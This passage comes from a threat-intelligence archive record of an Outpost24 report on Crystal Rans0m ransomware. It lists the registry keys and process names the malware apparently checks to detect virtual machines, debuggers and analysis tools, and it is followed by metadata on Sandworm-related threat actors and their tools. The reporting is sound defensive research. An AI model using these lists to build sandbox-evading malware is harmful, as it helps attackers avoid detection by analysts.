Additions\r\nSYSTEM\\ControlSet001\\Services\\VBoxGuest\r\nSYSTEM\\ControlSet001\\Services\\VBoxMouse\r\nSYSTEM\\ControlSet001\\Services\\VBoxService\r\nSYSTEM\\ControlSet001\\Services\\VBoxSF\r\nSYSTEM\\ControlSet001\\Services\\VBoxVideo\r\nSYSTEM\\ControlSet001\\Services\\vpcbus\r\nSYSTEM\\ControlSet001\\Services\\vpc-s3\r\nSYSTEM\\ControlSet001\\Services\\vpcuhub\r\nSYSTEM\\ControlSet001\\Services\\msvmmouf\r\nSOFTWARE\\VMware, Inc.\\VMware Tools\r\nSYSTEM\\ControlSet001\\Services\\vmdebug\r\nSYSTEM\\ControlSet001\\Services\\vmmouse\r\nSYSTEM\\ControlSet001\\Services\\VMTools\r\nSYSTEM\\ControlSet001\\Services\\VMMEMCTL\r\nSYSTEM\\ControlSet001\\Services\\vmware\r\nSYSTEM\\ControlSet001\\Services\\vmci\r\nSYSTEM\\ControlSet001\\Services\\vmx86\r\nSOFTWARE\\Wine\r\nHARDWARE\\ACPI\\DSDT\\xen\r\nHARDWARE\\ACPI\\FADT\\xen\r\nHARDWARE\\ACPI\\RSDT\\xen\r\nSYSTEM\\ControlSet001\\Services\\xenevtchn\r\nSYSTEM\\ControlSet001\\Services\\xennet\r\nSYSTEM\\ControlSet001\\Services\\xennet6\r\nSYSTEM\\ControlSet001\\Services\\xensvc\r\nSYSTEM\\ControlSet001\\Services\\xenvdb\r\nProcesses associated with VMs and analysis tools\r\nhttp toolkit.exe\r\nhttpdebuggerui.exe\r\nwireshark.exe\r\nfiddler.exe\r\ncharles.exe\r\nregedit.exe\r\ncmd.exe\r\ntaskmgr.exe\r\nvboxservice.exe\r\ndf5serv.exe\r\nprocesshacker.exe\r\nvboxtray.exe\r\nvmtoolsd.exe\r\nvmwaretray.exe\r\nida64.exe\r\nollydbg.exe\r\npestudio.exe\r\nvmwareuser\r\nvgauthservice.exe\r\nvmacthlp.exe\r\nx96dbg.exe\r\nvmsrvc.exe\r\nx32dbg.exe\r\nvmusrvc.exe\r\nprl_cc.exe\r\nprl_tools.exe\r\nqemu-ga.exe\r\njoeboxcontrol.exe\r\nksdumperclient.exe\r\nksdumper.exe\r\njoeboxserver.exe\r\nxenservice.exe\r\nAbout the Author\r\nLidia is a Senior Threat Intelligence Analyst at Outpost24’s KrakenLabs Strategic Research team. 
Her role involves researching and profiling threat actors and monitoring their campaigns, IOCs, and TTPs. She also creates threat intelligence reports and keeps a close eye on fraudulent activity in the cybercriminal underground.\r\nOutpost24’s Cyber Threat Intelligence team helps businesses stay ahead of malicious actors in the ever-evolving threat landscape, helping you keep your assets and brand reputation safe. With a comprehensive threat hunting infrastructure, our Threat Intelligence solution covers a broad range of threats on the market to help your business detect and deter external threats.\r\nSource: https://outpost24.com/blog/crystal-ransom-hybrid-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://outpost24.com/blog/crystal-ransom-hybrid-ransomware/"
	],
	"report_names": [
		"crystal-ransom-hybrid-ransomware"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ddf5aa3a-099f-4592-bb25-58ba16d6bb77",
			"created_at": "2024-06-07T02:00:04.008432Z",
			"updated_at": "2026-04-10T02:00:03.647153Z",
			"deleted_at": null,
			"main_name": "SEXi",
			"aliases": [],
			"source_name": "MISPGALAXY:SEXi",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434332,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2bf540cc8f1d9a7a0337e34cb61d79754087a1d.pdf",
		"text": "https://archive.orkl.eu/d2bf540cc8f1d9a7a0337e34cb61d79754087a1d.txt",
		"img": "https://archive.orkl.eu/d2bf540cc8f1d9a7a0337e34cb61d79754087a1d.jpg"
	}
}